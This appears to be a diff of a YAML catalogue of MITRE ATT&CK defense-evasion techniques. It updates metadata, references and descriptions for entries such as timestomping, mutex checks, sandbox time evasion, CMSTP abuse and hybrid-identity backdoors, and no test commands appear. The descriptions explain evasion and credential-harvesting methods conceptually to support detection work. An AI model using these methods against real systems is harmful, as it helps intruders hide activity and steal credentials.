-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests: []
   T1620:
@@ -4134,9 +4219,76 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests: []
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -4200,57 +4352,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -4265,6 +4370,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -4338,8 +4490,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests: []
   T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests: []
   T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4559,8 +4709,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests: []
   T1599.001:
@@ -4583,7 +4731,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -4702,18 +4849,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests: []
   T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -4905,9 +5049,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -4970,9 +5115,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests: []
   T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests: []
   T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
